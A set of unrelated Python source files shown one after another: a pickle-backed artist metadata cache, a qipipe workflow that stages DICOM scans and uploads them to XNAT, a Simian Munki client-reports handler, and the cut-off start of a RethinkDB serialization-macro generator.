mylog.ERR('error loading pickle file, continuing...')
ARTIST_META_CACHE = {}
GOOG_META_CACHE = {}
os.remove(globalz.PICKLE_FILE)
def dump():
''' save off the artist info we've found for next time '''
with open(globalz.PICKLE_FILE,'wb') as fl:
pickle.dump(ARTIST_META_CACHE, fl,-1)
pickle.dump(GOOG_META_CACHE, fl,-1)
def queryGoogCache(artist_name):
''' cache google queries to avoid web io '''
ret_pack = GOOG_META_CACHE.get(artist_name)
if not ret_pack:
mylog.DBG1(10,'GOOG_META_CACHE: not found key \'%s\'' % (artist_name))
GOOG_META_CACHE[artist_name] = googquery.googquery(unicode(artist_name).encode('utf-8'))
ret_pack = GOOG_META_CACHE.get(artist_name)
else:
mylog.DBG1(10,'GOOG_META_CACHE: found key \'%s\' val: \'%s\'' % (artist_name, unicode(ret_pack)))
return ret_pack
####################################
if __name__ == '__main__':
input_arg = ''
processDir = False
globalz.PICKLE_FILE = 'meh.pkl'
# if we've already queried artist info in the past, load it up, son!
undump()
try:
artist_str = sys.argv[1]
track_str = sys.argv[2]
except IndexError:
print 'usage: %s artist_name track1, track2, track3' % sys.argv[0]
exit(1)
(net_error, real_artist_str) = queryGoogCache(artist_str)
if net_error:
print 'net connection failure'
exit(1)
tracks = track_str.split(',')
for (i, track) in enumerate(tracks):
updateGuessCache('%s%d' % (track, i), track, real_artist_str)
refineGuessCache()
dbgPrint(sys.stdout)
# save off the artist info we've found for next time
dump()
|
|
import os
import glob
import shutil
import itertools
import logging
# The ReadTheDocs build does not include nipype.
on_rtd = os.environ.get('READTHEDOCS') == 'True'
if not on_rtd:
# Disable nipype nipy import FutureWarnings.
import warnings
with warnings.catch_warnings():
warnings.simplefilter(action='ignore', category=FutureWarning)
from nipype.pipeline import engine as pe
from nipype.interfaces.utility import (IdentityInterface, Function)
from nipype.interfaces.dcmstack import (DcmStack, MergeNifti)
import qixnat
from ..interfaces import (StickyIdentityInterface, FixDicom, Compress)
from .workflow_base import WorkflowBase
from ..helpers.constants import (
SCAN_TS_BASE, SCAN_TS_FILE, VOLUME_DIR_PAT, VOLUME_FILE_PAT
)
from ..helpers.logging import logger
from ..staging import (iterator, image_collection)
from ..staging.ohsu import MULTI_VOLUME_SCAN_NUMBERS
from ..staging.sort import sort
from .pipeline_error import PipelineError
SCAN_METADATA_RESOURCE = 'metadata'
"""The label of the XNAT resource holding the scan configuration."""
SCAN_CONF_FILE = 'scan.cfg'
"""The XNAT scan configuration file name."""
def run(subject, session, scan, *in_dirs, **opts):
"""
Runs the staging workflow on the given DICOM input directory.
The return value is a {*volume*: *file*} dictionary, where *volume*
is the volume number and *file* is the 3D NIfTI volume file.
:param subject: the subject name
:param session: the session name
:param scan: the scan number
:param in_dirs: the input DICOM file directories
:param opts: the :class:`ScanStagingWorkflow` initializer options
:return: the :meth:`ScanStagingWorkflow.run` result
"""
# The target directory for the fixed, compressed DICOM files.
_logger = logger(__name__)
dest_opt = opts.pop('dest', None)
if dest_opt:
dest = os.path.abspath(dest_opt)
if not os.path.exists(dest):
os.makedirs(dest)
else:
dest = os.getcwd()
# Print a debug log message.
in_dirs_s = in_dirs[0] if len(in_dirs) == 1 else [d for d in in_dirs]
_logger.debug("Staging the %s %s scan %d files in %s..." %
(subject, session, scan, in_dirs_s))
# We need the collection up front before creating the workflow, so
# we can't follow the roi or registration idiom of delegating to the
# workflow constructor to determine the collection.
coll_opt = opts.pop('collection', None)
if coll_opt:
collection = coll_opt
else:
parent_wf = opts.get('parent')
if parent_wf:
collection = parent_wf.collection
else:
raise PipelineError('The staging collection could not be'
' determined from the options')
# Make the scan workflow.
is_multi_volume = scan in MULTI_VOLUME_SCAN_NUMBERS
scan_wf = ScanStagingWorkflow(is_multi_volume=is_multi_volume, **opts)
# Sort the volumes.
vol_dcm_dict = sort(collection, scan, *in_dirs)
# Execute the workflow.
return scan_wf.run(collection, subject, session, scan, vol_dcm_dict, dest)
class ScanStagingWorkflow(WorkflowBase):
"""
The ScanStagingWorkflow class builds and executes the scan
staging supervisory Nipype workflow. This workflow delegates
to :meth:`qipipe.pipeline.staging.stage_volume` for each
iterated scan volume.
The scan staging workflow input is the *input_spec* node
consisting of the following input fields:
- *collection*: the collection name
- *subject*: the subject name
- *session*: the session name
- *scan*: the scan number
The scan staging workflow has one iterable:
- the *iter_volume* node with input fields *volume* and *in_files*
This iterable must be set prior to workflow execution.
The staging workflow output is the *output_spec* node consisting
of the following output field:
- *out_file*: the 3D volume stack NIfTI image file
"""
def __init__(self, is_multi_volume=True, **opts):
"""
:param is_multi_volume: flag indicating whether to include
volume merge tasks
:param opts: the :class:`qipipe.pipeline.workflow_base.WorkflowBase`
initializer keyword arguments
"""
super(ScanStagingWorkflow, self).__init__(__name__, **opts)
# Make the workflow.
self.workflow = self._create_workflow(is_multi_volume)
"""
The scan staging workflow sequence described in
:class:`qipipe.pipeline.staging.StagingWorkflow`.
"""
def run(self, collection, subject, session, scan, vol_dcm_dict, dest):
"""
Executes this scan staging workflow.
:param collection: the collection name
:param subject: the subject name
:param session: the session name
:param scan: the scan number
:param vol_dcm_dict: the input {volume: DICOM files} dictionary
:param dest: the destination directory
:return: the (time series, volume files) tuple
"""
# Set the top-level inputs.
input_spec = self.workflow.get_node('input_spec')
input_spec.inputs.collection = collection
input_spec.inputs.subject = subject
input_spec.inputs.session = session
input_spec.inputs.scan = scan
input_spec.inputs.dest = dest
# The volume grouping tag.
img_coll = image_collection.with_name(collection)
volume_tag = img_coll.patterns.volume
if not volume_tag:
raise PipelineError('The collection configuration DICOM'
' volume tag is missing.')
input_spec.inputs.volume_tag = volume_tag
# Prime the volume iterator.
in_volumes = sorted(vol_dcm_dict.iterkeys())
dcm_files = [vol_dcm_dict[v] for v in in_volumes]
iter_dict = dict(volume=in_volumes, in_files=dcm_files)
iterables = iter_dict.items()
iter_volume = self.workflow.get_node('iter_volume')
iter_volume.iterables = iterables
# Iterate over the volumes and corresponding DICOM files
# in lock-step.
iter_volume.synchronize = True
# Execute the workflow.
wf_res = self._run_workflow()
# If dry_run, then _run_workflow is a no-op.
if not wf_res:
return
# The magic incantation to get the Nipype workflow result.
output_res = next(n for n in wf_res.nodes() if n.name == 'output_spec')
time_series = output_res.inputs.get()['time_series']
volume_files = output_res.inputs.get()['volume_files']
self.logger.debug(
"Executed the %s workflow on the %s %s scan %d to create"
" %d volume files and the 4D time series %s." %
(self.workflow.name, subject, session, scan,
len(volume_files), time_series)
)
# Return the (time series, volume files) result.
return time_series, volume_files
def _create_workflow(self, is_multi_volume=True):
"""
Makes the staging workflow described in
:class:`qipipe.pipeline.staging.StagingWorkflow`.
:param is_multi_volume: flag indicating whether to include
volume merge tasks
:return: the new workflow
"""
self.logger.debug('Building the scan staging workflow...')
# The Nipype workflow object.
workflow = pe.Workflow(name='stage_scan', base_dir=self.base_dir)
# The workflow input.
hierarchy_fields = ['subject', 'session', 'scan']
stg_fields = hierarchy_fields + ['collection', 'dest']
in_fields = stg_fields + ['volume_tag']
input_spec = pe.Node(IdentityInterface(fields=in_fields),
name='input_spec')
self.logger.debug("The %s workflow input node is %s with fields %s" %
(workflow.name, input_spec.name, in_fields))
# The volume iterator.
iter_fields = ['volume', 'in_files']
iter_volume = pe.Node(IdentityInterface(fields=iter_fields),
name='iter_volume')
self.logger.debug("The %s workflow volume iterator node is %s"
" with fields %s" %
(workflow.name, iter_volume.name, iter_fields))
# The volume staging node wraps the stage_volume function.
stg_inputs = stg_fields + iter_fields + ['opts']
stg_xfc = Function(input_names=stg_inputs, output_names=['out_file'],
function=stage_volume)
stage = pe.Node(stg_xfc, name='stage_volume')
stage.inputs.opts = self._child_options()
for fld in stg_fields:
workflow.connect(input_spec, fld, stage, fld)
for fld in iter_fields:
workflow.connect(iter_volume, fld, stage, fld)
# Collect the 3D volume files.
collect_xfc = IdentityInterface(fields=['volume_files'])
collect_vols = pe.JoinNode(
collect_xfc, joinsource='iter_volume',
joinfield='volume_files', name='collect_volumes'
)
workflow.connect(stage, 'out_file', collect_vols, 'volume_files')
# Upload the processed DICOM and NIfTI files.
# The upload out_files output is the volume files.
upload_fields = (
hierarchy_fields +
['project', 'dcm_dir', 'volume_files', 'time_series']
)
upload_xfc = Function(input_names=upload_fields,
output_names=[],
function=_upload)
upload = pe.Node(upload_xfc, name='upload')
upload.inputs.project = self.project
workflow.connect(input_spec, 'subject', upload, 'subject')
workflow.connect(input_spec, 'session', upload, 'session')
workflow.connect(input_spec, 'scan', upload, 'scan')
workflow.connect(input_spec, 'dest', upload, 'dcm_dir')
workflow.connect(collect_vols, 'volume_files', upload, 'volume_files')
if is_multi_volume:
# Merge the volumes.
merge_xfc = MergeNifti(out_format=SCAN_TS_BASE)
merge = pe.Node(merge_xfc, name='merge')
workflow.connect(input_spec, 'volume_tag',
merge, 'sort_order')
workflow.connect(collect_vols, 'volume_files',
merge, 'in_files')
workflow.connect(merge, 'out_file',
upload, 'time_series')
self.logger.debug('Connected staging to scan time series merge.')
else:
upload.inputs.time_series = None
self.logger.debug('Connected scan time series merge to upload.')
# The output is the 4D time series and 3D NIfTI volume image files.
output_fields = ['time_series', 'volume_files']
output_spec = pe.Node(StickyIdentityInterface(fields=output_fields),
name='output_spec')
workflow.connect(collect_vols, 'volume_files',
output_spec, 'volume_files')
if is_multi_volume:
workflow.connect(merge, 'out_file', output_spec, 'time_series')
else:
output_spec.inputs.time_series = None
# Instrument the nodes for cluster submission, if necessary.
self._configure_nodes(workflow)
return workflow
class VolumeStagingWorkflow(WorkflowBase):
"""
The StagingWorkflow class builds and executes the staging Nipype workflow.
The staging workflow includes the following steps:
- Group the input DICOM images into volume.
- Fix each input DICOM file header using the
:class:`qipipe.interfaces.fix_dicom.FixDicom` interface.
- Compress each corrected DICOM file.
- Upload each compressed DICOM file into XNAT.
- Stack each new volume's 2-D DICOM files into a 3-D volume NIfTI file
using the DcmStack_ interface.
- Upload each new volume stack into XNAT.
- Make the CTP_ QIN-to-TCIA subject id map.
- Collect the id map and the compressed DICOM images into a target
directory in collection/subject/session/volume format for TCIA
upload.
The staging workflow input is the *input_spec* node consisting of
the following input fields:
- *collection*: the collection name
- *subject*: the subject name
- *session*: the session name
- *scan*: the scan number
The staging workflow has two iterables:
- the *iter_volume* node with input fields *volume* and *dest*
- the *iter_dicom* node with input fields *volume* and *dicom_file*
These iterables must be set prior to workflow execution. The
*iter_volume* *dest* input is the destination directory for
the *iter_volume* *volume*.
The *iter_dicom* node *itersource* is the ``iter_volume.volume``
field. The ``iter_dicom.dicom_file`` iterables is set to the
{volume: [DICOM files]} dictionary.
The DICOM files to upload to TCIA are placed in the destination
directory in the following hierarchy:
``/path/to/dest/``
*subject*\ /
*session*\ /
``volume``\ *volume number*\ /
*file*
...
where:
- *subject* is the subject name, e.g. ``Breast011``
- *session* is the session name, e.g. ``Session03``
- *volume number* is determined by the
:attr:`qipipe.staging.image_collection.Collection.patterns`
``volume`` DICOM tag
- *file* is the DICOM file name
The staging workflow output is the *output_spec* node consisting
of the following output field:
- *image*: the 3D volume stack NIfTI image file
.. Note:: Concurrent XNAT upload fails unpredictably due to one of
the causes described in the ``qixnat.facade.XNAT.find`` method
documentation.
The errors are addressed by the following measures:
* setting an isolated ``pyxnat`` *cache_dir* for each execution
node
* serializing the XNAT find-or-create access points with
``JoinNode``s
* increasing the SGE submission resource parameters as shown in
the ``conf/staging.cfg [upload]`` section
.. _CTP: https://wiki.cancerimagingarchive.net/display/Public/Image+Submitter+Site+User%27s+Guide
.. _DcmStack: http://nipy.sourceforge.net/nipype/interfaces/generated/nipype.interfaces.dcmstack.html
"""
def __init__(self, **opts):
"""
If the optional configuration file is specified, then the workflow
settings in that file override the default settings.
:param opts: the :class:`qipipe.pipeline.workflow_base.WorkflowBase`
initializer keyword arguments
"""
super(VolumeStagingWorkflow, self).__init__(__name__, **opts)
# Make the workflow.
self.workflow = self._create_workflow()
"""
The staging workflow sequence described in
:class:`qipipe.pipeline.staging.StagingWorkflow`.
"""
def run(self, collection, subject, session, scan, volume, dest,
*in_files):
"""
Executes this volume staging workflow.
:param collection: the collection name
:param subject: the subject name
:param session: the session name
:param scan: the scan number
:param volume: the volume number
:param dest: the destination directory
:param in_files: the input DICOM files
:return: the output 3D NIfTI volume file path
"""
# Set the top-level inputs.
input_spec = self.workflow.get_node('input_spec')
input_spec.inputs.collection = collection
input_spec.inputs.subject = subject
input_spec.inputs.session = session
input_spec.inputs.scan = scan
input_spec.inputs.volume = volume
input_spec.inputs.dest = dest
# Set the DICOM file iterator inputs.
iter_dicom = self.workflow.get_node('iter_dicom')
iter_dicom.iterables = ('dicom_file', in_files)
# Execute the workflow.
wf_res = self._run_workflow()
# If dry_run is set, then there is no result.
if not wf_res:
return None
# The magic incantation to get the Nipype workflow result.
output_res = next(
n for n in wf_res.nodes() if n.name == 'output_spec'
)
out_file = output_res.inputs.get()['out_file']
self.logger.debug(
"Executed the %s workflow on the %s %s scan %d with 3D"
" volume result %s." %
(self.workflow.name, subject, session, scan, out_file)
)
# Return the staged 3D volume files.
return out_file
def _create_workflow(self):
"""
Makes the staging workflow described in
:class:`qipipe.pipeline.staging.StagingWorkflow`.
:return: the new workflow
"""
# The Nipype workflow object.
self.logger.debug('Building the volume staging workflow...')
workflow = pe.Workflow(name='stage_volume', base_dir=self.base_dir)
# The workflow input.
in_fields = ['collection', 'subject', 'session', 'scan',
'volume', 'dest']
input_spec = pe.Node(IdentityInterface(fields=in_fields),
name='input_spec')
self.logger.debug("The %s workflow input node is %s with fields %s" %
(workflow.name, input_spec.name, in_fields))
# The DICOM file iterator.
iter_dicom = pe.Node(IdentityInterface(fields=['dicom_file']),
name='iter_dicom')
self.logger.debug("The %s workflow DICOM iterable node is %s." %
(workflow.name, iter_dicom.name))
# Fix the DICOM tags.
fix_dicom = pe.Node(FixDicom(), name='fix_dicom')
workflow.connect(input_spec, 'collection', fix_dicom, 'collection')
workflow.connect(input_spec, 'subject', fix_dicom, 'subject')
workflow.connect(iter_dicom, 'dicom_file', fix_dicom, 'in_file')
# Compress the corrected DICOM files.
compress_dicom = pe.Node(Compress(), name='compress_dicom')
workflow.connect(fix_dicom, 'out_file', compress_dicom, 'in_file')
workflow.connect(input_spec, 'dest', compress_dicom, 'dest')
# The volume file name format.
vol_fmt_xfc = Function(input_names=['collection'],
output_names=['format'],
function=volume_format)
vol_fmt = pe.Node(vol_fmt_xfc, name='volume_format')
workflow.connect(input_spec, 'collection', vol_fmt, 'collection')
# Stack the scan slices into a 3D volume NIfTI file.
stack_xfc = DcmStack(embed_meta=True)
stack = pe.JoinNode(stack_xfc, joinsource='iter_dicom',
joinfield='dicom_files', name='stack')
workflow.connect(fix_dicom, 'out_file', stack, 'dicom_files')
workflow.connect(vol_fmt, 'format', stack, 'out_format')
# The output is the 3D NIfTI stack file.
output_flds = ['out_file']
output_xfc = StickyIdentityInterface(fields=output_flds)
output_spec = pe.Node(output_xfc, name='output_spec')
workflow.connect(stack, 'out_file', output_spec, 'out_file')
# Instrument the nodes for cluster submission, if necessary.
self._configure_nodes(workflow)
self.logger.debug("Created the %s workflow." % workflow.name)
# If debug is set, then diagram the workflow graph.
if self.logger.level <= logging.DEBUG:
self.depict_workflow(workflow)
return workflow
def stage_volume(collection, subject, session, scan, volume, in_files,
dest, opts):
"""
Stages the given volume. The processed DICOM ``.dcm.gz`` files
are placed in the *dest*/*volume* subdirectory. The child
:class:`VolumeStagingWorkflow` runs in the
_parent_/volume\ _volume_ directory, where:
* _parent_ is the parent base directory specified in the
options (default current directory)
* _volume_ is the volume argument
:param collection: the collection name
:param subject: the subject name
:param session: the session name
:param scan: the scan number
:param volume: the volume number
:param in_files: the input DICOM files
:param dest: the parent destination directory
:param opts: the :class:`VolumeStagingWorkflow` initializer
options
:return: the 3D NIfTI volume file
"""
import os
import shutil
from qipipe.helpers.logging import logger
from qipipe.pipeline.staging import VolumeStagingWorkflow
_logger = logger(__name__)
# The volume destination is a dest subdirectory.
dest = os.path.abspath(dest)
out_dir = "%s/volume%03d" % (dest, volume)
os.mkdir(out_dir)
# The volume workflow runs in a subdirectory.
parent_dir = opts.pop('base_dir', os.getcwd())
base_dir = "%s/volume%03d" % (parent_dir, volume)
# Make the workflow.
stg_wf = VolumeStagingWorkflow(base_dir=base_dir, **opts)
# Execute the workflow.
logger(__name__).debug("Staging %s %s scan %d volume %d in %s..." %
(subject, session, scan, volume, out_dir))
out_file = stg_wf.run(collection, subject, session, scan, volume,
out_dir, *in_files)
logger(__name__).debug("Staged %s %s scan %d volume %d in %s." %
(subject, session, scan, volume, out_dir))
return out_file
def _upload(project, subject, session, scan, dcm_dir, volume_files,
time_series=None):
"""
Uploads the staged files.
:param project: the project name
:param subject: the subject name
:param session: the session name
:param scan: the scan number
:param dcm_dir: the input staged directory
:param volume_files: the 3D scan volume files
:param time_series: the 4D scan time series file, if the scan is
multi-volume
"""
from qipipe.pipeline.staging import (upload_dicom, upload_nifti)
# Delegate to the public functions.
upload_dicom(project, subject, session, scan, dcm_dir)
# The NIfTI files.
if time_series:
nii_files = volume_files + [time_series]
else:
nii_files = volume_files
upload_nifti(project, subject, session, scan, nii_files)
def upload_dicom(project, subject, session, scan, dcm_dir):
"""
Uploads the staged ``.dcm.gz`` files in *dcm_dir* to the
XNAT scan ``DICOM`` resource
:param project: the project name
:param subject: the subject name
:param session: the session name
:param scan: the scan number
:param dcm_dir: the input staged directory
"""
_logger = logger(__name__)
# The volume directories.
vol_dir_pat = "%s/volume*" % dcm_dir
vol_dirs = glob.glob(vol_dir_pat)
if not vol_dirs:
raise PipelineError("The input directory does not contain any"
" DICOM directories matching %s" % vol_dir_pat)
_logger.debug("Uploading %d %s %s scan %d volumes to XNAT..." %
(len(vol_dirs), subject, session, scan))
# Upload one volume directory at a time, since pyxnat upload
# takes up a big chunk of memory, perhaps due to a memory leak.
dcm_file_cnt = 0
for vol_dir in vol_dirs:
# The DICOM files to upload.
dcm_file_pat = "%s/*.dcm.gz" % vol_dir
dcm_files = glob.glob(dcm_file_pat)
if not dcm_files:
raise PipelineError(
"The input DICOM volume directory %s does not contain scan"
" DICOM files matching %s" % (vol_dir, dcm_file_pat)
)
# Upload the compressed DICOM files.
_, vol_dir_base_name = os.path.split(vol_dir)
vol_nbr_match = VOLUME_DIR_PAT.match(vol_dir_base_name)
vol_nbr_grp = vol_nbr_match.group('volume_number')
vol_nbr = int(vol_nbr_grp)
_logger.debug(
"Uploading %d %s %s scan %d volume %s DICOM files to XNAT..." %
(len(dcm_files), subject, session, scan, vol_nbr)
)
with qixnat.connect() as xnat:
# The target XNAT scan DICOM resource object.
# The modality option is required if it is necessary to
# create the XNAT scan object.
rsc = xnat.find_or_create(
project, subject, session, scan=scan, resource='DICOM',
modality='MR'
)
xnat.upload(rsc, *dcm_files)
dcm_file_cnt += len(dcm_files)
_logger.debug("Uploaded %d %s %s scan %d staged DICOM files to"
" XNAT." % (dcm_file_cnt, subject, session, scan))
def upload_nifti(project, subject, session, scan, files):
"""
Uploads the staged NIfTI files to the XNAT scan ``NIFTI``
resource.
:param project: the project name
:param subject: the subject name
:param session: the session name
:param scan: the scan number
:param files: the NIfTI files to upload
"""
_logger = logger(__name__)
# Upload the NIfTI files in one action.
file_cnt = len(files)
_logger.debug("Uploading %d %s %s scan %d staged NIfTI files to"
" XNAT..." % (file_cnt, subject, session, scan))
with qixnat.connect() as xnat:
# The target XNAT scan NIFTI resource object.
rsc = xnat.find_or_create(
project, subject, session, scan=scan, resource='NIFTI'
)
xnat.upload(rsc, *files)
_logger.debug("Uploaded %d %s %s scan %d staged NIfTI files to"
" XNAT." % (file_cnt, subject, session, scan))
def volume_format(collection):
"""
The DcmStack format for making a file name from the DICOM
volume tag.
Example::
>> volume_format('Sarcoma')
"volume%(AcquisitionNumber)03d"
:param collection: the collection name
:return: the volume file name format
"""
from qipipe.staging import image_collection
img_coll = image_collection.with_name(collection)
# Escape the leading % and inject the DICOM tag.
return "volume%%(%s)03d" % img_coll.patterns.volume
|
|
#!/usr/bin/env python
#
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Reports URL handlers."""
import datetime
import json
import logging
import os
import re
import urllib
from simian.auth import gaeserver
from simian.mac import common as main_common
from simian.mac import models
from simian.mac.common import gae_util
from simian.mac.common import util
from simian.mac.munki import common
from simian.mac.munki import handlers
# int number of days after which postflight_datetime is considered stale.
FORCE_CONTINUE_POSTFLIGHT_DAYS = 5
# int number of failed Munki executions before instructing the client to repair.
REPAIR_CLIENT_PREFLIGHT_COUNT_SINCE_POSTFLIGHT = 5
INSTALL_RESULT_FAILED = 'FAILED with return code'
INSTALL_RESULT_SUCCESSFUL = 'SUCCESSFUL'
JSON_PREFIX = ')]}\',\n'
LEGACY_INSTALL_RESULTS_STRING_REGEX = re.compile(
r'^Install of (.*)-(\d+.*): (%s|%s: (\-?\d+))$' % (
INSTALL_RESULT_SUCCESSFUL, INSTALL_RESULT_FAILED))
# Example: 'iLife 11: Download failed (Error -1001: The request timed out.)'
DOWNLOAD_FAILED_STRING_REGEX = re.compile(
r'([\s\w\.\-]+): Download failed \((.*)\)')
# For legacy clients that do not support multiple feedback commands via JSON,
# this list is used to determine which single command to send, if any, in
# increasing importance order.
LEGACY_FEEDBACK_LIST = ['EXIT', 'FORCE_CONTINUE', 'REPAIR', 'UPLOAD_LOGS']
def IsExitFeedbackIpAddress(ip_address):
"""Is this an IP address that should result in an exit feedback?
Args:
ip_address: str, like "1.2.3.4"
Returns:
True if this IP address should result in exit feedback
"""
return (
ip_address and
models.KeyValueCache.IpInList('client_exit_ip_blocks', ip_address))
class Reports(handlers.AuthenticationHandler):
"""Handler for /reports/."""
def GetReportFeedback(self, uuid, report_type, **kwargs):
"""Inspect a report and provide a feedback status/command.
Args:
uuid: str, computer uuid
report_type: str, report type
**kwargs: dict, additional report parameters, e.g:
on_corp: str, optional, '1' or '0', on_corp status
message: str, optional, message from client
details: str, optional, details from client
ip_address: str, optional, IP address of client
Returns:
common.ReportFeedback.* constant
"""
feedback = {}
if 'computer' in kwargs:
c = kwargs['computer']
else:
c = models.Computer.get_by_key_name(uuid)
ip_address = kwargs.get('ip_address', None)
client_exit = kwargs.get('client_exit', None)
if client_exit and report_type == 'preflight':
# client has requested an exit, but let's ensure we should allow it.
if c is None or c.postflight_datetime is None:
# client has never fully executed Munki.
feedback['force_continue'] = True
else:
# check if the postflight_datetime warrants a FORCE_CONTINUE
now = datetime.datetime.utcnow()
postflight_stale_datetime = now - datetime.timedelta(
days=FORCE_CONTINUE_POSTFLIGHT_DAYS)
if c.postflight_datetime < postflight_stale_datetime:
# client hasn't executed Munki in FORCE_CONTINUE_POSTFLIGHT_DAYS.
feedback['force_continue'] = True
else:
feedback['exit'] = True
elif report_type == 'preflight':
if IsExitFeedbackIpAddress(ip_address):
feedback['exit'] = True
elif common.IsPanicModeNoPackages():
feedback['exit'] = True
elif not c or c.preflight_datetime is None:
# this is the first preflight post from this client.
feedback['force_continue'] = True
elif getattr(c, 'upload_logs_and_notify', None) is not None:
feedback['logging_level'] = 3
feedback['upload_logs'] = True
else:
# check if preflight_count_since_postflight warrants a repair.
if (c.preflight_count_since_postflight >=
REPAIR_CLIENT_PREFLIGHT_COUNT_SINCE_POSTFLIGHT):
feedback['pkill_installd'] = True
feedback['pkill_softwareupdated'] = True
feedback['repair'] = True
feedback['logging_level'] = 3
feedback['upload_logs'] = True
return feedback
def _LogInstalls(self, installs, computer):
"""Logs a batch of installs for a given computer.
Args:
installs: list, of str install data from a preflight/postflight report.
computer: models.Computer entity.
"""
if not installs:
return
on_corp = self.request.get('on_corp')
if on_corp == '1':
on_corp = True
elif on_corp == '0':
on_corp = False
else:
on_corp = None
to_put = []
for install in installs:
if install.startswith('Install of'):
d = {
'applesus': 'false',
'duration_seconds': None,
'download_kbytes_per_sec': None,
'name': install,
'status': 'UNKNOWN',
'version': '',
'unattended': 'false',
}
# support for old 'Install of FooPkg-1.0: SUCCESSFUL' style strings.
try:
m = LEGACY_INSTALL_RESULTS_STRING_REGEX.search(install)
if not m:
raise ValueError
elif m.group(3) == INSTALL_RESULT_SUCCESSFUL:
d['status'] = 0
else:
d['status'] = m.group(4)
d['name'] = m.group(1)
d['version'] = m.group(2)
except (IndexError, AttributeError, ValueError):
logging.warning('Unknown install string format: %s', install)
else:
# support for new 'name=pkg|version=foo|...' style strings.
d = common.KeyValueStringToDict(install)
name = d.get('display_name', '') or d.get('name', '')
version = d.get('version', '')
status = str(d.get('status', ''))
applesus = common.GetBoolValueFromString(d.get('applesus', '0'))
unattended = common.GetBoolValueFromString(d.get('unattended', '0'))
try:
duration_seconds = int(d.get('duration_seconds', None))
except (TypeError, ValueError):
duration_seconds = None
try:
dl_kbytes_per_sec = int(d.get('download_kbytes_per_sec', None))
# Ignore zero KB/s download speeds, as that's how Munki reports
# unknown speed.
if dl_kbytes_per_sec == 0:
dl_kbytes_per_sec = None
except (TypeError, ValueError):
dl_kbytes_per_sec = None
try:
install_datetime = util.Datetime.utcfromtimestamp(d.get('time', None))
except ValueError as e:
logging.info('Ignoring invalid install_datetime: %s', str(e))
install_datetime = datetime.datetime.utcnow()
except util.EpochExtremeFutureValueError as e:
logging.info('Ignoring extreme future install_datetime: %s', str(e))
install_datetime = datetime.datetime.utcnow()
except util.EpochFutureValueError:
install_datetime = datetime.datetime.utcnow()
pkg = '%s-%s' % (name, version)
entity = models.InstallLog(
uuid=computer.uuid, computer=computer, package=pkg, status=status,
on_corp=on_corp, applesus=applesus, unattended=unattended,
duration_seconds=duration_seconds, mtime=install_datetime,
dl_kbytes_per_sec=dl_kbytes_per_sec)
entity.success = entity.IsSuccess()
to_put.append(entity)
gae_util.BatchDatastoreOp(models.db.put, to_put)
def post(self):
"""Reports get handler.
Returns:
A webapp.Response() response.
"""
session = gaeserver.DoMunkiAuth()
uuid = main_common.SanitizeUUID(session.uuid)
report_type = self.request.get('_report_type')
report_feedback = {}
message = None
details = None
client_id = None
computer = None
if report_type == 'preflight' or report_type == 'postflight':
client_id_str = urllib.unquote(self.request.get('client_id'))
client_id = common.ParseClientId(client_id_str, uuid=uuid)
user_settings_str = self.request.get('user_settings')
user_settings = None
try:
if user_settings_str:
user_settings = util.Deserialize(
urllib.unquote(str(user_settings_str)))
except util.DeserializeError:
logging.warning(
'Client %s sent broken user_settings: %s',
client_id_str, user_settings_str)
pkgs_to_install = self.request.get_all('pkgs_to_install')
apple_updates_to_install = self.request.get_all(
'apple_updates_to_install')
computer = models.Computer.get_by_key_name(uuid)
ip_address = os.environ.get('REMOTE_ADDR', '')
if report_type == 'preflight':
# we want to get feedback now, before preflight_datetime changes.
client_exit = self.request.get('client_exit', None)
report_feedback = self.GetReportFeedback(
uuid, report_type, computer=computer, ip_address=ip_address,
client_exit=client_exit)
if self.request.get('json') == '1':
self.response.out.write(JSON_PREFIX + json.dumps(report_feedback))
else:
# For legacy clients that accept a single string, not JSON.
feedback_to_send = 'OK'
for feedback in LEGACY_FEEDBACK_LIST:
if report_feedback.get(feedback.lower()):
feedback_to_send = feedback
self.response.out.write(feedback_to_send)
# if report feedback calls for a client exit, log it.
if report_feedback.get('exit'):
if not client_exit:
# client didn't ask for an exit, which means server decided.
client_exit = 'Connection from defined exit IP address'
common.WriteClientLog(
models.PreflightExitLog, uuid, computer=computer,
exit_reason=client_exit)
cert_fingerprint = None
common.LogClientConnection(
report_type, client_id, user_settings, pkgs_to_install,
apple_updates_to_install, computer=computer, ip_address=ip_address,
report_feedback=report_feedback, cert_fingerprint=cert_fingerprint)
elif report_type == 'install_report':
computer = models.Computer.get_by_key_name(uuid)
self._LogInstalls(self.request.get_all('installs'), computer)
for removal in self.request.get_all('removals'):
common.WriteClientLog(
models.ClientLog, uuid, computer=computer, action='removal',
details=removal)
for problem in self.request.get_all('problem_installs'):
common.WriteClientLog(
models.ClientLog, uuid, computer=computer,
action='install_problem', details=problem)
elif report_type == 'broken_client':
# Default reason of "objc" to support legacy clients, existing when objc
# was the only broken state ever reported.
reason = self.request.get('reason', 'objc')
details = self.request.get('details')
logging.warning('Broken Munki client (%s): %s', reason, details)
common.WriteBrokenClient(uuid, reason, details)
elif report_type == 'msu_log':
details = {}
for k in ['time', 'user', 'source', 'event', 'desc']:
details[k] = self.request.get(k, None)
common.WriteComputerMSULog(uuid, details)
else:
# unknown report type; log all post params.
params = []
for param in self.request.arguments():
params.append('%s=%s' % (param, self.request.get_all(param)))
common.WriteClientLog(
models.ClientLog, uuid, action='unknown', details=str(params))
|
|
#!/usr/bin/env python
# Copyright 2010-2014 RethinkDB, all rights reserved.
import sys
"""This script is used to generate the RDB_MAKE_SERIALIZABLE_*() and
RDB_MAKE_ME_SERIALIZABLE_*() macro definitions. Because there are so
many variations, and because they are so similar, it's easier to just
have a Python script to generate them.
This script is meant to be run as follows (assuming you are in the
top directory):
$ ./scripts/generate_serialize_macros.py > src/rpc/serialize_macros.hpp
"""
def generate_make_serializable_macro(nfields):
fields = "".join(", field%d" % (i + 1) for i in xrange(nfields))
zeroarg = ("UNUSED " if nfields == 0 else "")
print "#define RDB_MAKE_SERIALIZABLE_%d(type_t%s) \\" % \
(nfields, fields)
print " template <cluster_version_t W> \\"
print " void serialize(%swrite_message_t *wm, %sconst type_t &thing) { \\" % (zeroarg, zeroarg)
for i in xrange(nfields):
